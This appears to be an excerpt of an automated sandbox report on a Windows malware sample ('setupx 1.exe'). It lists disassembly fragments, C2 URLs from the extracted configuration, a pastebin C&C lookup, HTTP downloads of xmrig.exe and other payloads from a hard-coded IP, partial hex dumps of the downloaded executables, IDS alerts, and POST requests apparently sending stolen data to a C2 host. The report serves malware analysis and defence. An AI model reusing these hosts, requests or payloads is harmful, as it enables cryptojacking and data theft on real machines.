Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-30h]	2_2_004490C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [ebx+ecx]	2_2_0044816C
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov dword ptr [esp], eax	2_2_00410993
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+35B9B860h]	2_2_0041BAC1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-56B7A16Ch]	2_2_0041BAC1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebp+02h]	2_2_00429460
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_00448CC3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then lea edi, dword ptr [eax-0000008Ah]	2_2_0044BCE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	2_2_0044AE40
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then push edi	2_2_00411E2A
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]	2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx-19B91E8Ah]	2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h	2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+2Ch]	2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6D58C181h	2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]	2_2_0042F760
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]	2_2_0042F760
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then lea ebp, dword ptr [edx+ecx]	2_2_0042F760
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then inc ebx	2_2_00401040
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov dword ptr [esp], edx	2_2_0044B840
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-58D31E9Ah]	2_2_00431850
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov eax, ebx	2_2_00424030
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_004208F5
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then jmp dword ptr [00451774h]	2_2_0041F888
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_00420091
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000088h]	2_2_004288A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004288A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004288A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_0041312E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov word ptr [ecx], si	2_2_004201C3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_0040A1E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_0040A1E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+esi]	2_2_0040B240
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+25E74604h]	2_2_004112E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_0042031B
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+454B1CDCh]	2_2_0040D3D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov dword ptr [esi+04h], edx	2_2_004113E2
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then push edi	2_2_004313F7
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-099F648Ah]	2_2_0042FB80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	2_2_0041AC10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 8D94E5DFh	2_2_0041ACD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 53991D4Eh	2_2_0041ACD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-041B93BAh]	2_2_0040C4E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then and esi, 80000000h	2_2_0040BC80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then push ebx	2_2_0041FC88
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+10h]	2_2_0040FCB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov dword ptr [esp+18h], ecx	2_2_0041D4B8
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	2_2_00444542
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0043FD70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	2_2_00446D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	2_2_00446D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	2_2_00446D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-00000092h]	2_2_0042FDCC
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5AE16A62h]	2_2_004485D1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]	2_2_0042ED90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]	2_2_0042ED90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+4E981752h]	2_2_0041E5BB
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov byte ptr [edx], al	2_2_00423612
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_004336C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+08BA2EA8h]	2_2_004236E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E74604h]	2_2_004326FC
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_00437682
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [eax+ecx+61250952h]	2_2_00432E9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then push edi	2_2_00431775
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	2_2_00431FCA
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_00402780
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+24h]	2_2_0041EF9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	2_2_0043F7B0
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_054B4668

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: citydisco.bet/gdJIS
Source: Malware configuration extractor	URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:33:56 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 46 00 00 00 20 00 00 00 48 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 06 00 00 00 80 00 00 00 08 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 66 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 36 00 00 dc 2c 00 00 03 00 02 00 10 00 00 06 c4 63 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 b5 00 00 00 01 00 00 11 02 14 7d 1c 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 28 05 00 00 06 00 28 03 00 00 06 00 02 28 0b 00 00 06 00 02 28 0a 00 00 06 00 7e 19 00 00 04 72 01 00 00 70 6f 15 00 00 0a 0a 06 2c 30 00 7e 03 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 7e 0f 00 00 04 7e 12 00 00 04 72 23 00 00 70 16 28 04 00 00 06 00 00 2b 18 00 7e 02 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 00 7e 01 00 00 04 7e 12 00 00 04 72 43 00 00 70 16 28 04 00 00 06 00 28 08 00 00 06 00 28 0c 00 00 06 00 02 28 0e 00 00 06 00 2a 00 00 00 13 30 03 00 21 00 00 00 02 00 00 11 00 02 28 16 00 00 0a 0a 06 25 6f 17 00 00 0a 20 80 00 00 00 60 6f 18 00 00 0a 00 06 0b 2b 00 07 2a 00 00 00 1b 30 04 00 a7 01 00 00 03 00 00 11 00 00 20 00 0f 00 00 28 19 00 00 0a 00 20 10 27 00 00 8d 31 00 00 01 0a 16 0b 16 0c 73 1a 00 00 0a 0d 09 7e 10 00 00 04 6f 1b 00 00 0a 13 04 11 04 73 1c 00 00 0a 13 05 00 06 16 72 5b
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:34:03 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:34:03 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
Source: global traffic	HTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49692 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49690 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49688 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49691 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49694 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.8:49701 -> 185.215.113.51:80

Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PF7T3HoaLds6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14499Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6XEyhosNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15025Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SHu2usqr78969User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20219Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=n1eA4K8BqyRYg06s7EMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2455Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=82suKX2btIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552658Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: citydisco.bet

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
